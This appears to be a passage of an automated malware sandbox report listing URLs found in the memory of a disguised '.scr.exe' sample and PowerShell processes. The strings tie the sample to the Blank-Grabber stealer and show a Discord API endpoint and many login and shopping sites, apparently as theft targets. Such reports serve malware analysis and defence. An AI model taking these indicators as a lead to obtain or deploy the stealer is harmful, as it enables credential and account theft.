              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C8737A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2060606390.0000028C87391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2059021822.0000028C87D20000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2058548042.0000028C87CE6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2058318262.0000028C87E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 00000029.00000002.2158201728.0000015301914000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C872E0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052434132.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052638977.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2051510820.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327145319.0000028C8724C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C872E0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052434132.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052638977.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2051510820.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C8737A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2060852882.0000028C877E6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2061237289.0000028C87680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C872E0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052434132.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052638977.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2051510820.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154822441.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2321848291.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330228467.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2162960886.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154463139.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87B75000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920px
              Source: powershell.exe, 00000029.00000002.2158201728.0000015300C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000007.00000002.2286012485.000001619A462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.micros
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877E5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163201271.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322889946.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154159134.0000028C877C5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2130602364.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323195620.0000028C877D3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877E1000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326282443.0000028C877E4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877D6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877D9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2082475372.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163456438.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2127743261.0000028C87B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154463139.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87B75000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2060431464.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88298000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C8828C000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2332092681.0000028C88A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 00000007.00000002.2265902518.0000016191CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2187351911.0000015310075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2158201728.000001530196F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000029.00000002.2158201728.000001530176B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000029.00000002.2158201728.000001530176B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2053300423.0000028C876DF000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2057343585.0000028C876DA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2057514542.0000028C876DF000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2053108442.0000028C876DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8C63000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142899018.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2136068563.0000028C87C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154822441.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2321848291.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C97000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2162960886.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327717608.0000028C87630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163201271.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C8737A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322889946.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154159134.0000028C877C5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2130602364.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323195620.0000028C877D3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877D6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877D9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2082475372.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163456438.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330698605.0000028C88140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C87F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88220000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2135317494.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123650876.0000028C8873A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2103806631.0000028C8873B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.oL
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2152989212.0000028C8874D000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88284000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142899018.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88270000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2136068563.0000028C87C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C97000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C97000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2093617683.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
